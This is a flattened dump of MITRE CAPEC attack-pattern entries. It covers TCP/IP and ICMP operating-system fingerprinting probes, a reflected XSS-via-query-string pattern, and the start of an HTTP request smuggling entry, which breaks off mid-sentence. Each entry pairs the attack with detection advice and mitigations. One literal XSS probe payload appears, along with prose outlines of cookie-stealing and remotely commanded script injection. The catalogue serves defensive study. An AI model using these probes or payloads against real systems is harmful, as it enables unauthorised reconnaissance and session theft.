OS inference. Network Layer Server-side Host RFC 792 Type The ICMP Type Field determines the function of the ICMP query. A Type 8 message directs the target to reply to the sender of the echo request message with an echo reply message. In forming an echo reply the source and destination addresses are switched, the Type field is set to '0', any data contained in the data portion of the echo request is sent "echoed" back to the host, and the checksum is recalculated. 8 ICMP echo requests may contain arbitrary data as a payload. When the ICMP Type is 8 (echo request), the data received in the echo message must be returned in the echo reply message. Uses Protocol The ability to generate and analyze ICMP messages from a target. In cases where certain message types are blocked by a firewall, the reliability of ICMP fingerprinting declines sharply. Low Confidentiality "Varies by context" Confidentiality Access_Control Authorization Bypass protection mechanism Hide activities 1000 Attack Pattern ChildOf 312 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pg. 56 6th Edition McGraw Hill 2009 J. Postel RFC792 - Internet Control Messaging Protocol Defense Advanced Research Projects Agency (DARPA) September 1981 http://www.faqs.org/rfcs/rfc792.html R. Braden, Ed. RFC1122 - Requirements for Internet Hosts - Communication Layers October 1989 http://www.faqs.org/rfcs/rfc1122.html Ofir Arkin A Remote Active OS Fingerprinting Tool using ICMP The Sys-Security Group April 2002 http://ofirarkin.files.wordpress.com/2008/11/login.pdf This OS fingerprinting probe analyzes the IP 'ID' field sequence number generation algorithm of a remote host. Operating systems generate IP 'ID' numbers differently, allowing an attacker to identify the operating system of the host by examining how is assigns ID numbers when generating response packets. RFC 791 does not specify how ID numbers are chosen or their ranges, so ID sequence generation differs from implementation to implementation. There are two kinds of IP 'ID' sequence number analysis: 1. IP 'ID' Sequencing: Analyzing the IP 'ID' sequence generation algorithm for one protocol used by a host. 2. Shared IP 'ID' Sequencing: Analyzing the packet ordering via IP 'ID' values spanning multiple protocols, such as between ICMP and TCP. Network Layer Server-side Host Identifier The Identifier field 'ID' is a 16 bit field used for fragment reassembly. Uses Protocol Uses Protocol Uses Protocol Uses Protocol Uses Protocol Low Confidentiality "Varies by context" Confidentiality Access_Control Authorization Bypass protection mechanism Hide activities 1000 Attack Pattern ChildOf 314 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pg. 56 6th Edition McGraw Hill 2009 Defense Advanced Research Projects Agency Information Processing Techniques Office Information Sciences Institute University of Southern California RFC793 - Transmission Control Protocol Defense Advanced Research Projects Agency (DARPA) September 1981 http://www.faqs.org/rfcs/rfc793.html Gordon "Fyodor" Lyon Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning Chapter 8. Remote OS Detection 3rd "Zero Day" Edition, Insecure.com LLC 2008 Gordon "Fyodor" Lyon The Art of Port Scanning Volume: 7, Issue. 51 Phrack Magazine 1997 http://www.phrack.org/issues.html?issue=51&id=11#article CAPEC Content Team MITRE 2013-12-18 Updated References This OS fingerprinting probe tests to determine if the remote host echoes back the IP 'ID' value from the probe packet. An attacker sends a UDP datagram with an arbitrary IP 'ID' value to a closed port on the remote host to observe the manner in which this bit is echoed back in the ICMP error message. The identification field (ID) is typically utilized for reassembling a fragmented packet. Some operating systems or router firmware reverse the bit order of the ID field when echoing the IP Header portion of the original datagram within an ICMP error message. Transport Layer Server-side Host Identifier The Identifier field 'ID' is a 16 bit field used for fragment reassembly. Uses Protocol Uses Protocol Uses Protocol Uses Protocol Uses Protocol Low Confidentiality "Varies by context" Confidentiality Access_Control Authorization Bypass protection mechanism Hide activities 1000 Attack Pattern ChildOf 314 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pg. 56 6th Edition McGraw Hill 2009 Defense Advanced Research Projects Agency Information Processing Techniques Office Information Sciences Institute University of Southern California RFC793 - Transmission Control Protocol Defense Advanced Research Projects Agency (DARPA) September 1981 http://www.faqs.org/rfcs/rfc793.html Gordon "Fyodor" Lyon Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning Chapter 8. Remote OS Detection 3rd "Zero Day" Edition, Insecure.com LLC 2008 Gordon "Fyodor" Lyon The Art of Port Scanning Volume: 7, Issue. 51 Phrack Magazine 1997 http://www.phrack.org/issues.html?issue=51&id=11#article CAPEC Content Team MITRE 2013-12-18 Updated References This OS fingerprinting probe tests to determine if the remote host echoes back the IP 'DF' (Don't Fragment) bit in a response packet. An attacker sends a UDP datagram with the DF bit set to a closed port on the remote host to observe whether the 'DF' bit is set in the response packet. Some operating systems will echo the bit in the ICMP error message while others will zero out the bit in the response packet. Transport Layer Server-side Host Flags The Don't Fragment Flag indicates that a datagram should not be fragmented under any circumstance. DF Uses Protocol Uses Protocol Uses Protocol Uses Protocol Uses Protocol Low Confidentiality "Varies by context" Confidentiality Access_Control Authorization Bypass protection mechanism Hide activities 1000 Attack Pattern ChildOf 314 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pg. 56 6th Edition McGraw Hill 2009 Defense Advanced Research Projects Agency Information Processing Techniques Office Information Sciences Institute University of Southern California RFC793 - Transmission Control Protocol Defense Advanced Research Projects Agency (DARPA) September 1981 http://www.faqs.org/rfcs/rfc793.html Gordon "Fyodor" Lyon Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning Chapter 8. Remote OS Detection 3rd "Zero Day" Edition, Insecure.com LLC 2008 Gordon "Fyodor" Lyon The Art of Port Scanning Volume: 7, Issue. 51 Phrack Magazine 1997 http://www.phrack.org/issues.html?issue=51&id=11#article CAPEC Content Team MITRE 2013-12-18 Updated References A variant of cross-site scripting called "reflected" cross-site scripting, the HTTP Query Strings attack consists of passing a malicious script inside an otherwise valid HTTP request query string. This is of significant concern for sites that rely on dynamic, user-generated content such as bulletin boards, news sites, blogs, and web enabled administration GUIs. The malicious script may steal session data, browse history, probe files, or otherwise execute attacks on the client side. Once the attacker has prepared the malicious HTTP query it is sent to a victim user (perhaps by email, IM, or posted on an online forum), who clicks on a normal looking link that contains a poison query string. This technique can be made more effective through the use of services like http://tinyurl.com/, which makes very small URLs that will redirect to very large, complex ones. The victim will not know what he is really clicking on. Spider Using a browser or an automated tool, an attacker follows all public links on a web site. He records all the links he finds. Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL. env-Web Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms. env-Web Use a browser to manually explore the website and analyze how it is constructed. Many browser's plugins are available to facilitate the analysis or automate the URL discovery. env-Web URL parameters are used by the application or the browser (DOM) env-Web Using URL rewriting, parameters may be part of the URL path. env-Web No parameters appear on the URL. Even though none appear, the web application may still use them if they are provided. env-Web Application could use POST variable as GET inside the application. Therefore, looking for POST parameters and adding them to the query string. env-Web Applications that have only static pages or that simply present information without accepting input are unlikely to be susceptible. env-Web A list of URLs, with their corresponding parameters is created by the attacker. Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them). Create links on some pages that are visually hidden from web browsers. Using iframes, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application. Use CAPTCHA to prevent the use of the application by an automated tool. Actively monitor the application and either deny or redirect requests from origins that appear to be automated. Attempt variations on input parameters Possibly using an automated tool, an attacker requests variations on the URLs he spidered before. He sends parameters that include variations of payloads. He records all the responses from the server that include unmodified versions of his script. Use a list of XSS probe strings to inject in parameters of known URLs. If possible, the probe strings contain a unique identifier. env-Web Use a proxy tool to record results of manual input of XSS probes in known URLs. env-Web The output of pages includes some form of a URL parameter. E.g., ?error="File not Found" becomes "File not Found" in the title of the web page. env-Web Input parameters become part of JavaScript, VBScript, or other script in a web page. env-Web Nothing is returned to the web page. It may be a stored XSS. The unique identifier from the probe helps to trace the flow of the possible XSS. env-Web The attacker's cross-site scripting string is repeated back verbatim at some point in the web site (if not on the same page). Note that sometimes, the payload might be well encoded in the page, but wouldn't be encoded at all in some other section of the same web page (title, script, etc.) All HTML-sensitive characters are consistently re-encoded before being sent to the web browser. Some sensitive characters are consistently encoded, but others are not. Monitor input to web servers, application servers, and other HTTP infrastructure (e.g., load balancers). Alert on standard XSS probes. The majority of attackers use well-known strings to check for vulnerabilities. Use the same vulnerability catalogs that hackers use. Apply appropriate input validation to filter all user-controllable input of scripting syntax Do not embed user-controllable input generated HTTP headers Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes. Steal session IDs, credentials, page content, etc. As the attacker succeeds in exploiting the vulnerability, he can choose to steal user's credentials in order to reuse or to analyze them later on. Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and sends document information to the attacker. env-Web Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute appropriately. env-Web The attacker gets the user's cookies or other session identifiers. The attacker gets the content of the page the user is viewing. The attacker causes the user's browser to visit a page with malicious content. Monitor server logs for scripting parameters. Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate. Apply appropriate input validation to filter all user-controllable input of scripting syntax Appropriately encode all browser output to avoid scripting syntax Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes. Forceful browsing When the attacker targets the current application or another one (through CSRF vulnerabilities), the user will then be the one who perform the attacks without being aware of it. These attacks are mostly targeting application logic flaws, but it can also be used to create a widespread attack against a particular website on the user's current network (Internet or not). Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and performs actions on the same web site env-Web Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute request to other web sites (especially the web applications that have CSRF vulnerabilities). env-Web The attacker indirectly controls the user's browser and makes it performing actions exploiting CSRF. The attacker manipulates the browser through the steps that he designed in his attack. The user, identified on a website, is now performing actions he is not aware of. Monitor server logs for scripting parameters. Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate. Apply appropriate input validation to filter all user-controllable input of scripting syntax Appropriately encode all browser output to avoid scripting syntax Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes. Content spoofing By manipulating the content, the attacker targets the information that the user would like to get from the website. Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and exposes attacker-modified invalid information to the user on the current web page. env-Web The user sees a page containing wrong information Monitor server logs for scripting parameters. Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate. Apply appropriate input validation to filter all user-controllable input of scripting syntax Appropriately encode all browser output to avoid scripting syntax Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes. Target client software must allow scripting such as JavaScript. Server software must allow display of remote generated HTML without sufficient input or output validation. High High Injection Protocol Manipulation http://user:host@example.com:8080/oradb<script>alert('Hi')</script> Web applications that accept name value pairs in a HTTP Query string are inherently at risk to any value (or name for that matter) that an attacker would like to enter in the query string. This can be done manually via web browser or trivially scripted to post the query string to multiple sites. In the latter case, in the instance of many sites using similar infrastructure with predictable http queries being accepted and operated on (such as blogging software, Google applications, and so on), a single malicious payload can be scripted to target a wide variety of sites. Web 2.0 type sites like Technorati and del.icio.us rely on user generated content like tags to build http links that are displayed to other users. del.icio.us allows users to identify sites, tag them with metadata and provide URL, descriptions and more data. This data is then echoed back to any other web browser that is interested in the link. If the data is not validated by the del.icio.us site properly then an arbitrary code can be added into the standard http string sent to del.icio.us by the attacker, for example formatted as normal content with a URL and description and tagged as Java, and available to be clicked on (and executed by) any user browsing for Java content that clicks on this trojaned content. Low To place malicious payload on server via HTTP High Exploiting any information gathered by HTTP Query on script host Ability to send HTTP post to scripting host and collect output Design: Use browser technologies that do not allow client side scripting. Design: Utilize strict type, character, and encoding enforcement Design: Server side developers should not proxy content via XHR or other means, if a http proxy for remote content is setup on the server side, the client's browser has no way of discerning where the data is originating from. Implementation: Ensure all content that is delivered to client is sanitized against an acceptable content specification. Implementation: Perform input validation for all remote content, including remote and user-generated content Implementation: Perform output validation for all remote content. Implementation: Disable scripting languages such as JavaScript in browser Implementation: Session tokens for specific host Implementation: Patching software. There are many attack vectors for XSS on the client side and the server side. Many vulnerabilities are fixed in service packs for browser, web servers, and plug in technologies, staying current on patch release that deal with XSS countermeasures mitigates this. Implementation: Privileges are constrained, if a script is loaded, ensure system runs in chroot jail or other limited authority mode Confidentiality Read application data Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code Script delivered through standard web server, such as a web server with user-generated content. HTTP Request Query String Client web browser where script is executed Client web browser may be used to steal session data, passwords, cookies, and other tokens. 79 Targeted 84 Targeted 85 Targeted 20 Targeted 86 Targeted 692 Targeted 697 Targeted 713 Targeted 71 Targeted 1000 Attack Pattern ChildOf 18 1000 Attack Pattern ChildOf 220 Exploitation High High Low Client-Server n-Tier All All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 [R.32.1][REF-2] Cigital, Inc 2007-01-01 [R.32.1][REF-2] Cigital, Inc 2007-01-01 Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name and Examples Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Romain Gaucher Cigital, Inc 2009-02-10 Created draft content for detailed description Sean Barnum Cigital Federal, Inc 2009-04-13 Reviewed and revised content for detailed description Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name and Examples Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Romain Gaucher Cigital, Inc 2009-02-10 Created draft content for detailed description Sean Barnum Cigital Federal, Inc 2009-04-13 Reviewed and revised content for detailed description CAPEC Content Team MITRE 2013-12-18 Updated Attack_Phases CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Attack_Prerequisites, Examples-Instances, Solutions_and_Mitigations This OS fingerprinting probe examines the remote server's implementation of TCP timestamps. Not all operating systems implement timestamps within the TCP header, but when timestamps are used then this provides the attacker with a means to guess the operating system of the target. The attacker begins by probing any active TCP service in order to get response which contains a TCP timestamp. Different Operating systems update the timestamp value using different intervals. This type of analysis is most accurate when multiple timestamp responses are received and then analyzed. TCP timestamps can be found in the TCP Options field of the TCP header. 1. The attacker sends a probe packet to the remote host to identify if timestamps are present. 2. If the remote host is using timestamp, the attacker sends several requests and records the timestamp values. 3. The attacker analyzes the timestamp values and determines an average increments per second in the timestamps for the target. 3. The attacker compares this result to a database of known TCP timestamp increments for a possible match. Network Layer Server-side Host Options Field Options may occupy space at the end of the TCP header and are a multiple of 8 bits in length. All options are included in the checksum. Uses Protocol The target OS must support the TCP timestamp option in order to obtain a fingerprint. Low Confidentiality "Varies by context" Confidentiality Access_Control Authorization Bypass protection mechanism 1000 Attack Pattern ChildOf 315 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pg. 56 6th Edition McGraw Hill 2009 Defense Advanced Research Projects Agency Information Processing Techniques Office Information Sciences Institute University of Southern California RFC793 - Transmission Control Protocol Defense Advanced Research Projects Agency (DARPA) September 1981 http://www.faqs.org/rfcs/rfc793.html Gordon "Fyodor" Lyon Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning Chapter 8. Remote OS Detection 3rd "Zero Day" Edition, Insecure.com LLC 2008 CAPEC Content Team MITRE 2013-12-18 Updated References This OS fingerprinting probe tests the target system's assignment of TCP sequence numbers. One common way to test TCP Sequence Number generation is to send a probe packet to an open port on the target and then compare the how the Sequence Number generated by the target relates to the Acknowledgement Number in the probe packet. Different operating systems assign Sequence Numbers differently, so a fingerprint of the operating system can be obtained by categorizing the relationship between the acknowledgement number and sequence number as follows: 1. The Sequence Number generated by the target is Zero. 2. The Sequence Number generated by the target is the same as the acknowledgement number in the probe 3. The Sequence Number generated by the target is the acknowledgement number plus one 3. The Sequence Number is any other non-zero number. Transport Layer Server-side Host Sequence Number The sequence number of the first data octet a TCP segment. ACK RFC 792 Acknowledgement Number If the ACK control bit is set this field contains the starting value of the next sequence number the sender of the segment is expecting to receive. ACK Uses Protocol The ability to send an TCP ACK segment to an open port and receive a response back containing a TCP sequence number. Low Confidentiality "Varies by context" Confidentiality Access_Control Authorization Bypass protection mechanism Hide activities 1000 Attack Pattern ChildOf 315 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pg. 55-56 6th Edition McGraw Hill 2009 Defense Advanced Research Projects Agency Information Processing Techniques Office Information Sciences Institute University of Southern California RFC793 - Transmission Control Protocol Defense Advanced Research Projects Agency (DARPA) September 1981 http://www.faqs.org/rfcs/rfc793.html Gordon "Fyodor" Lyon Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning Chapter 8. Remote OS Detection 3rd "Zero Day" Edition, Insecure.com LLC 2008 CAPEC Content Team MITRE 2013-12-18 Updated References This OS fingerprinting probe sends a number of TCP SYN packets to an open port of a remote machine. The Initial Sequence Number (ISN) in each of the SYN/ACK response packets is analyzed to determine the smallest number that the target host uses when incrementing sequence numbers. This information can be useful for identifying an operating system because particular operating systems and versions increment sequence numbers using different values. The result of the analysis is then compared against a database of OS behaviors to determine the OS type and/or version. Transport Layer Server-side Host Sequence Number The sequence number of the first data octet in a segment (except when a SYN flag is present). If SYN is present the sequence number is the initial sequence number (ISN) of the connection and the first data octet is ISN+1. The sequence number consists of 32 bits. For purposes of Sequence number analysis the data portion of the packet is either empty or ignored. Uses Protocol Low Confidentiality "Varies by context" Confidentiality Access_Control Authorization Bypass protection mechanism Hide activities 1000 Attack Pattern ChildOf 315 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pg. 56 6th Edition McGraw Hill 2009 Defense Advanced Research Projects Agency Information Processing Techniques Office Information Sciences Institute University of Southern California RFC793 - Transmission Control Protocol Defense Advanced Research Projects Agency (DARPA) September 1981 http://www.faqs.org/rfcs/rfc793.html Gordon "Fyodor" Lyon Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning Chapter 8. Remote OS Detection 3rd "Zero Day" Edition, Insecure.com LLC 2008 CAPEC Content Team MITRE 2013-12-18 Updated References This OS detection probe measures the average rate of initial sequence number increments during a period of time. Sequence numbers are incremented using a time-based algorithm and are susceptible to a timing analysis that can determine the number of increments per unit time. The result of this analysis is then compared against a database of operating systems and versions to determine likely operation system matches. Transport Layer Server-side Host Sequence Number The sequence number of the first data octet in a segment (except when a SYN flag is present). If SYN is present the sequence number is the initial sequence number (ISN) of the connection and the first data octet is ISN+1. The sequence number consists of 32 bits. For purposes of Sequence number analysis the data portion of the packet is either empty or ignored. Uses Protocol Low Confidentiality "Varies by context" Confidentiality Access_Control Authorization Bypass protection mechanism Hide activities 1000 Attack Pattern ChildOf 315 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pg. 56 6th Edition McGraw Hill 2009 Defense Advanced Research Projects Agency Information Processing Techniques Office Information Sciences Institute University of Southern California RFC793 - Transmission Control Protocol Defense Advanced Research Projects Agency (DARPA) September 1981 http://www.faqs.org/rfcs/rfc793.html Gordon "Fyodor" Lyon Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning Chapter 8. Remote OS Detection 3rd "Zero Day" Edition, Insecure.com LLC 2008 CAPEC Content Team MITRE 2013-12-18 Updated References This type of operating system probe attempts to determine an estimate for how predictable the sequence number generation algorithm is for a remote host. Statistical techniques, such as standard deviation, can be used to determine how predictable the sequence number generation is for a system. This result can then be compared to a database of operating system behaviors to determine a likely match for operating system and version. Transport Layer Server-side Host Sequence Number The sequence number of the first data octet in a segment (except when a SYN flag is present). If SYN is present the sequence number is the initial sequence number (ISN) of the connection and the first data octet is ISN+1. The sequence number consists of 32 bits. For purposes of Sequence number analysis the data portion of the packet is either empty or ignored. Uses Protocol Low Confidentiality "Varies by context" Confidentiality Access_Control Authorization Bypass protection mechanism Hide activities 1000 Attack Pattern ChildOf 315 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pg. 56 6th Edition McGraw Hill 2009 Defense Advanced Research Projects Agency Information Processing Techniques Office Information Sciences Institute University of Southern California RFC793 - Transmission Control Protocol Defense Advanced Research Projects Agency (DARPA) September 1981 http://www.faqs.org/rfcs/rfc793.html Gordon "Fyodor" Lyon Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning Chapter 8. Remote OS Detection 3rd "Zero Day" Edition, Insecure.com LLC 2008 Gordon "Fyodor" Lyon The Art of Port Scanning Volume: 7, Issue. 51 Phrack Magazine 1997 http://www.phrack.org/issues.html?issue=51&id=11#article CAPEC Content Team MITRE 2013-12-18 Updated References This OS fingerprinting probe checks to see if the remote host supports explicit congestion notification (ECN) messaging. ECN messaging was designed to allow routers to notify a remote host when signal congestion problems are occurring. Explicit Congestion Notification messaging is defined by RFC 3168. Different operating systems and versions may or may not implement ECN notifications, or may respond uniquely to particular ECN flag types. Network Layer Server-side Host RFC 3168 Explicit Congestion Notification (ECN) field. Bits 6 and 7 in the IPv4 TOS octet are designated as the ECN field. The not-ECT codepoint '00' indicates a packet that is not using ECN. 00 RFC 3168 Explicit Congestion Notification (ECN) field. Bits 6 and 7 in the IPv4 TOS octet are designated as the ECN field. The ECT(1) bit. Binary flag '01' indicates a packet is using ECN(1) channel. 01 RFC 3168 Explicit Congestion Notification (ECN) field. Bits 6 and 7 in the IPv4 TOS octet are designated as the ECN field. The ECT(0) bit. Binary flag '10' indicates a packet is using ECT(0) channel. 10 RFC 3168 Explicit Congestion Notification (ECN) field. Bits 6 and 7 in the IPv4 TOS octet are designated as the ECN field. The CE codepoint '11' is set by a router to indicate congestion to the end nodes. 11 Uses Protocol RFC 3168 Reserved Field ECN-Echo flag. The ECN-Echo flag is assigned to Bit 9 in the Reserved field of the TCP header. ECE RFC 3168 Reserved Field CWR Flag. The CWR flag is assigned to Bit 8 in the Reserved field of the TCP header. CWR Uses Protocol Low Confidentiality "Varies by context" Confidentiality Access_Control Authorization Bypass protection mechanism Hide activities 1000 Attack Pattern ChildOf 315 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pg. 56 6th Edition McGraw Hill 2009 Defense Advanced Research Projects Agency Information Processing Techniques Office Information Sciences Institute University of Southern California RFC793 - Transmission Control Protocol Defense Advanced Research Projects Agency (DARPA) September 1981 http://www.faqs.org/rfcs/rfc793.html Gordon "Fyodor" Lyon Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning Chapter 8. Remote OS Detection 3rd "Zero Day" Edition, Insecure.com LLC 2008 CAPEC Content Team MITRE 2013-12-18 Updated References This OS fingerprinting probe checks the initial TCP Window size. TCP stacks limit the range of sequence numbers allowable within a session to maintain the "connected" state within TCP protocol logic. The initial window size specifies a range of acceptable sequence numbers that will qualify as a response to an ACK packet within a session. Various operating systems use different Initial window sizes. The initial window size can be sampled by establishing an ordinary TCP connection. Transport Layer Server-side Host Window The 16 bit window indicates an allowed number of octets that the sender may transmit before receiving further permission. ACK Acknowledgement Number If the ACK control bit is set this field contains the value of the next sequence number the sender of the segment is expecting to receive. Once a connection is established this is always sent. ACK Uses Protocol Low Confidentiality "Varies by context" Confidentiality Access_Control Authorization Bypass protection mechanism Hide activities 1000 Attack Pattern ChildOf 315 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pg. 56 6th Edition McGraw Hill 2009 Defense Advanced Research Projects Agency Information Processing Techniques Office Information Sciences Institute University of Southern California RFC793 - Transmission Control Protocol Defense Advanced Research Projects Agency (DARPA) September 1981 http://www.faqs.org/rfcs/rfc793.html Gordon "Fyodor" Lyon Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning Chapter 8. Remote OS Detection 3rd "Zero Day" Edition, Insecure.com LLC 2008 CAPEC Content Team MITRE 2013-12-18 Updated References This OS fingerprinting probe analyzes the type and order of any TCP header options present within a response segment. Most operating systems use unique ordering and different option sets when options are present. RFC 793 does not specify a required order when options are present, so different implementations use unique ways of ordering or structuring TCP options. TCP options can be generated by ordinary TCP traffic. Transport Layer Server-side Host Options Field The Options Field allows a TCP segment to specify specific requirements for its routing or may contain information such as a timestamp. Options may occupy space at the end of the TCP header and are a multiple of 8 bits in length. All options are included in the checksum. Uses Protocol Low Confidentiality "Varies by context" Confidentiality Access_Control Authorization Bypass protection mechanism Hide activities 1000 Attack Pattern ChildOf 315 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pg. 56 6th Edition McGraw Hill 2009 Defense Advanced Research Projects Agency Information Processing Techniques Office Information Sciences Institute University of Southern California RFC793 - Transmission Control Protocol Defense Advanced Research Projects Agency (DARPA) September 1981 http://www.faqs.org/rfcs/rfc793.html Gordon "Fyodor" Lyon Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning Chapter 8. Remote OS Detection 3rd "Zero Day" Edition, Insecure.com LLC 2008 CAPEC Content Team MITRE 2013-12-18 Updated References This OS fingerprinting probe performs a checksum on any ASCII data contained within the data portion or a RST packet. Some operating systems will report a human-readable text message in the payload of a 'RST' (reset) packet when specific types of connection errors occur. RFC 1122 allows text payloads within reset packets but not all operating systems or routers implement this functionality. Transport Layer Server-side Host 1122 Data "A TCP SHOULD allow a received RST segment to include data. It has been suggested that a RST segment could contain ASCII text that encoded and explained the cause of the RST. No standard has yet been established for such data" data Uses Protocol Low Confidentiality "Varies by context" Confidentiality Access_Control Authorization Bypass protection mechanism Hide activities 1000 Attack Pattern ChildOf 315 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pg. 56 6th Edition McGraw Hill 2009 Defense Advanced Research Projects Agency Information Processing Techniques Office Information Sciences Institute University of Southern California RFC793 - Transmission Control Protocol Defense Advanced Research Projects Agency (DARPA) September 1981 http://www.faqs.org/rfcs/rfc793.html Gordon "Fyodor" Lyon Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning Chapter 8. Remote OS Detection 3rd "Zero Day" Edition, Insecure.com LLC 2008 CAPEC Content Team MITRE 2013-12-18 Updated References An attacker uses a technique to generate an ICMP Error message (Port Unreachable, Destination Unreachable, Redirect, Source Quench, Time Exceeded, Parameter Problem) from a target and then analyze the amount of data returned or "Quoted" from the originating request that generated the ICMP error message. For this purpose "Port Unreachable" error messages are often used, as generating them requires the attacker to send a UDP datagram to a closed port on the target. The goal of this analysis to make inferences about the type of operating system or firmware that sent the error message in reply. This is useful for identifying unique characteristics of operating systems because the RFC-1122 expected behavior reads: "Every ICMP error message includes the Internet header and at least the first 8 data octets of the datagram that triggered the error; more than 8 octets MAY be sent [...]." This contrasts with RFC-792 expected behavior, which limited the quoted text to 64 bits (8 octets). Given the latitude in the specification the resulting RFC-1122 stack implementations often respond with a high degree of variability in the amount of data quoted in the error message because "older" or "legacy" stacks may comply with the RFC-792 specification, while other stacks may choose a longer format in accordance with RFC-1122. As a general rule most operating systems or firmware will quote the first 8 bytes of the datagram triggering the error, but some IP stacks will quote more than the first 8 bytes of data. Network Layer Server-side Host RFC 792 Type The ICMP Type Field determines the function of the ICMP query. A Type 8 message directs the target to reply to the sender of the echo request message with an echo reply message. In forming an echo reply the source and destination addresses are switched, the Type field is set to '0', any data contained in the data portion of the echo request is sent "echoed" back to the host, and the checksum is recalculated. 8 ICMP echo requests may contain arbitrary data as a payload. When the ICMP Type is 8 (echo request), the data received in the echo message must be returned in the echo reply message. Uses Protocol The ability to send a UDP datagram to a closed port and receive an ICMP Error Message Type 3, "Port Unreachable" Low Confidentiality "Varies by context" Confidentiality Access_Control Authorization Bypass protection mechanism Hide activities 1000 Attack Pattern ChildOf 316 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pg. 56 6th Edition McGraw Hill 2009 J. Postel RFC792 - Internet Control Messaging Protocol Defense Advanced Research Projects Agency (DARPA) September 1981 http://www.faqs.org/rfcs/rfc792.html R. Braden, Ed. RFC1122 - Requirements for Internet Hosts - Communication Layers October 1989 http://www.faqs.org/rfcs/rfc1122.html Ofir Arkin A Remote Active OS Fingerprinting Tool using ICMP The Sys-Security Group April 2002 http://ofirarkin.files.wordpress.com/2008/11/login.pdf CAPEC Content Team MITRE 2014-02-06 Updated Attack_Prerequisites HTTP Request Smuggling results from the discrepancies in parsing HTTP requests between HTTP entities such as web caching proxies or application firewalls. Entities such as web servers, web caching proxies, application firewalls or simple proxies often parse HTTP requests in slightly different ways. Under specific situations where there are two or more such entities in the path of the HTTP request, a specially crafted request is seen by two attacked entities as two different sets of requests. This allows certain requests to be smuggled through to a second entity without the first one realizing it. Identify HTTP parsing chain Determine the technologies used in the target environment such as types of web servers, application firewalls, proxies, etc. Investigation of the target environment to determine the types of technologies used to parse the incoming HTTP requests. Attempt to understand the parsing chain traversed by the incoming HTTP request. env-Web Full HTTP parsing chain for the application has been identified Probe for vulnerable differences in HTTP parsing chain Attacker sends malformed HTTP Requests to the application looking for differences in the ways that individual layers in the parsing chain parse 